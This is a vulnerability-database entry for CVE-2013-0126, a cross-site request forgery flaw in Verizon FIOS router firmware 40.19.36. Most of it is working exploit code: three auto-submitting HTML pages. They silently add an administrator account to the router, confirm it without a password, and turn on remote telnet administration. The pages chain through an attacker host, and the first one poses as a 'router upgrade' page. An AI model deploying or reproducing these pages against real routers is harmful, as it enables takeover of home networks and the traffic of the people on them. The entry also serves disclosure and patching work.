Verizon Fios Router CSRF Admin Shell

vendor:

FIOS Router

by:

Jacob Holcomb/Gimppy

8,8

CVSS

HIGH

Cross-Site Request Forgery (CSRF)

352

CWE

Product Name: FIOS Router

Affected Version From: 40.19.36

Affected Version To: 40.19.36

Patch Exists: YES

Related CWE: CVE-2013-0126

CPE: h:verizon:fios_router

Metasploit: https://www.rapid7.com/db/vulnerabilities/linuxrpm-ELSA-2013-0126/

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2013

Verizon Fios Router CSRF Admin Shell

Verizon Fios Router CSRF Admin Shell is a vulnerability discovered and reported in January 2013 by Jacob Holcomb/Gimppy, a Security Analyst at Independent Security Evaluators. The vulnerability affects the Verizon FIOS Router with Firmware 40.19.36. It allows an attacker to add an administrator user to the router without any password confirmation. The exploit code consists of two HTML files, the first one adds the administrator user and the second one adds the user without any password confirmation.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to update the router to the latest firmware version.

Source

Exploit-DB raw data:

# Exploit Title: Verizon Fios Router CSRF Admin Shell 
# Date: Discovered and reported January 2013
# Author: Jacob Holcomb/Gimppy - Security Analyst @ Independent Security Evaluators
# Software: Verizon FIOS Router - Firmware 40.19.36 (http://verizon.com)
# CVE: CVE-2013-0126
# Advisory/Video: http://infosec42.blogspot.com/2013/03/verizon-fios-router-csrf-cve-2013-0126.html

US CERT Disclosure: http://www.kb.cert.org/vuls/id/278204

Exploit Code:

HTML FILE #1

<html>
<title>Cisco Verizon FIOS CSRF - Adding Administrator User</title>
<!--Cisco Model: MI424WR-GEN3I -->
<!--Firmware Version: 40.19.36 -->
<h1>Please sit tight while we upgrade your router</h1>

<body>

<form name="verizonCisco" action="http://192.168.1.1/index.cgi" method="post">
<input type="hidden" name="active_page" value="101"/>
<input type="hidden" name="page_title" value="User Settings"/>
<input type="hidden" name="mimic_button_field" value="submit_button_submit: .."/>
<input type="hidden" name="button_value" value="."/>
<input type="hidden" name="strip_page_top" value="0"/>
<input type="hidden" name="user_id" value="-1"/>
<input type="hidden" name="fullname_defval" value=""/>
<input type="hidden" name="fullname" value="g42"/>
<input type="hidden" name="username_defval" value=""/>
<input type="hidden" name="username" value="G42"/>
<input type="hidden" name="user_level" value="2"/>
<input type="hidden" name="email_system_notify_level" value="15"/>
<input type="hidden" name="email_security_notify_level" value="15"/>
</form>

<script>
function CSRF1() {window.open("http://10.0.1.101/verizonFIOS2.html");};window.setTimeout(CSRF1,1000)
function CSRF2() {document.verizonCisco.submit();};window.setTimeout(CSRF2,1000)
</script>

</body>
</html>

HTML FILE #2

<html>
<title>Cisco Verizon FIOS CSRF2 - Add User w/ No Pass Confirmation</title>

<body>

<form name="verizonCiscoC" action="http://192.168.1.1/index.cgi" method="post">
<input type="hidden" name="active_page" value="101"/>
<input type="hidden" name="page_title" value="User Settings"/>
<input type="hidden" name="mimic_button_field" value="submit_button_confirm_submit: .."/>
<input type="hidden" name="button_value" value="."/>
<input type="hidden" name="strip_page_top" value="0"/>
</form>

<script>
function CSRF1() {window.open("http://10.0.1.101/verizonFIOS3.html");};window.setTimeout(CSRF1,0500)
function CSRF2() {document.verizonCiscoC.submit();};window.setTimeout(CSRF2,0500)
</script>

</body>
</html>

HTML FILE #3

 <html>
<title>Cisco Verizon FIOS CSRF3 - Enable Remote Administration</title>

<body>

<form name="verizonCiscoRemote" action="http://192.168.1.1/index.cgi" method="post">
<input type="hidden" name="active_page" value="9078"/>
<input type="hidden" name="active_page_str" value="page_remote_admin"/>
<input type="hidden" name="page_title" value="Remote Administration"/>
<input type="hidden" name="mimic_button_field" value="submit_button_submit: .."/>
<input type="hidden" name="button_value" value=""/>
<input type="hidden" name="strip_page_top" value="0"/>
<input type="hidden" name="is_telnet_primary" value="1"/>
<input type="hidden" name="is_telnet_primary_defval" value="0"/>
<input type="hidden" name="is_telnet_secondary_defval" value="0"/>
<input type="hidden" name="is_telnet_ssl_defval" value="0"/>
<input type="hidden" name="is_http_primary_defval" value="0"/>
<input type="hidden" name="is_http_secondary_defval" value="0"/>
<input type="hidden" name="is_https_primary_defval" value="0"/>
<input type="hidden" name="is_https_secondary_defval" value="0"/>
<input type="hidden" name="is_diagnostics_icmp_defval" value="0"/>
<input type="hidden" name="is_diagnostics_traceroute_defval" value="0"/>
<input type="hidden" name="is_telnet_secondary" value="1"/>
</form>

<script>
function CSRF1() {document.verizonCiscoRemote.submit();};window.setTimeout(CSRF1,0000)
</script>

</body>
</html>